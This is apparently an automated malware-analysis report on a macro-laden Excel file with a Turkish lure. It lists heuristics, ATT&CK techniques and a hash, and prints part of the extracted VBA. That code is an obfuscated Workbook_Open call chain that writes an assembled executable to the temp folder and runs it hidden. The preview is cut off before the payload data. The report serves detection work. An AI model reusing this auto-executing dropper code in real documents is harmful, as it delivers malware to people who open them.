Verdict: MALICIOUS
Risk Score: 228
Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution
The sample is an Excel file containing VBA macros, specifically a Workbook_Open macro that calls the Shell() function. The document body contains a Turkish lure suggesting that macros need to be enabled to view the content. The VBA script is heavily obfuscated, but the Workbook_Open auto-execution and the Shell() call indicate that it is designed to download and execute a second-stage payload, consistent with known malware delivery techniques.
Heuristics (6)
- ClamAV: Xls.Malware.Valyria-10036514-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Malware.Valyria-10036514-0
- VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Workbook_Open macro (high, OLE_VBA_WBOPEN): Workbook_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): Environ() call (env variable access)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15007 bytes |

SHA-256: 0239e860f0e7af2d37e2ef14db0ceae745b3f25dbd0b964dd3694af3e2de6815
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "Git"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Gel"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Static Sub woRKBOOK_Open(): Call UTlna: End Sub
Sub UTlna()
Call jJrRg
End Sub
Function jJrRg() As Date
Call LUFLP
End Function
Function LUFLP() As Variant
Call aKLoV
End Function
Static Sub aKLoV()
Call pARSa
End Sub
Static Sub pARSa()
Call RLfMK
End Sub
Static Function RLfMK() As Double
Call gBlqP
End Function
Sub gBlqP()
Call INzky
End Sub
Sub INzky()
Call XDFOE
End Sub
Function XDFOE() As Single
Call zOTIn
End Function
Private Sub zOTIn()
Call mOHFl
End Sub
Function mOHFl() As Long
Call PZVzU
End Function
Function PZVzU() As Date
Call dPbda
End Function
Sub dPbda()
Call GaqXJ
End Sub
Sub GaqXJ()
Call UQvAP
End Sub
Function UQvAP()
Call xcKuy
End Function
Sub xcKuy()
Call MSPYE
End Sub
Sub MSPYE()
Call odeSn
End Sub
Private Function odeSn() As Currency
Call DTjws
End Function
Private Sub DTjws()
Call RJpay
End Sub
Private Sub RJpay()
Call ZrFOF
End Sub
Static Sub ZrFOF()
Call nhKrK
End Sub
Static Sub nhKrK()
Call QtZlt
End Sub
Static Function QtZlt() As Byte
Call ejePz
End Function
Private Function ejePz()
Call HutJi
End Function
Private Sub HutJi()
Call Wkyno
End Sub
Private Sub Wkyno()
Call yvNhX
End Sub
Private Function yvNhX() As Long
Call NlSLd
End Function
Private Function NlSLd() As Date
Call pxhFM
End Function
Static Sub pxhFM()
Call EnniS
End Sub
Static Function EnniS() As Date
Call FIjwt
End Function
Static Sub FIjwt()
Call Typaz
End Sub
Static Function Typaz() As String
Call wJDUi
End Function
Static Function wJDUi() As Boolean
Call KzJxo
End Function
Static Sub KzJxo()
Call nKXrX
End Sub
Static Sub nKXrX()
Call CAdVc
End Sub
Static Function CAdVc() As Object
Call Qqizi
End Function
Static Function Qqizi() As Long
Call tCxtR
End Function
Static Sub tCxtR()
Call HsDXX
End Sub
Function HsDXX() As Long
Call kDRRG
End Function
Private Function kDRRG() As Single
Call dQYoj
End Function
Private Function dQYoj() As String
Call GbniS
End Function
Private Sub GbniS()
Call URsMY
End Sub
Private Sub URsMY()
Call xcHGH
End Sub
Function xcHGH() As Currency
Call LSMkN
End Function
Function LSMkN() As Object
Call oebew
End Function
Sub oebew()
Call DUgIB
End Sub
Sub DUgIB()
Call ffvCl
End Sub
Function ffvCl() As Variant
Call uVAfq
End Function
Sub uVAfq()
Call vqxtS
End Sub
Static Function vqxtS() As Single
Call JgDWX
End Function
Private Sub JgDWX()
Call YWIAd
End Sub
Private Sub YWIAd()
Call AhXuM
End Sub
Private Function AhXuM() As Integer
Call PYcYS
End Function
Private Function PYcYS() As Currency
Call rjrSB
End Function
Private Sub rjrSB()
Call GZwwH
End Sub
Private Sub GZwwH()
Call gzxsv(VBA.Environ("TMP") & "\KUjjm.exe", ikZeU): Call Shell(VBA.Environ("TMP") & "\KUjjm.exe", vbHide)
End Sub
Private Function ikZeU()
ikZeU = pseEM
Call bLOwy(ikZeU, oWAPU)
Call bLOwy(ikZeU, kZHFk)
Call bLOwy(ikZeU, DQLiR)
Call bLOwy(ikZeU, vVWLE)
Call bLOwy(ikZeU, QTgPC)
Call bLOwy(ikZeU, SsThc)
Call bLOwy(ikZeU, asIVi)
Call bLOwy(ikZeU, YMfzD)
Call bLOwy(ikZeU, igXZj)
Call bLOwy(ikZeU, kzkrj)
Call bLOwy(ikZeU, VnAZm)
Call bLOwy(ikZeU, yfSYg)
Call bLOwy(ikZeU, XFgQW)
Call bLOwy(ikZeU, Ezdut)
Call bLOwy(ikZeU, CGMFO)
Call bLOwy(ikZeU, zhAWU)
Call bLOwy(ikZeU, ayDAW)
Call bLOwy(ikZeU, mOGJW)
Call bLOwy(ikZeU, CVrLZ)
Call bLOwy(ikZeU, WMkHG)
Call bLOwy(ikZeU, APAno)
Call bLOwy(ikZeU, rwfpl)
Call bLOwy(ikZeU, IAZFd)
Call bLOwy(ikZeU, FaUrv)
Call bLO
... (truncated)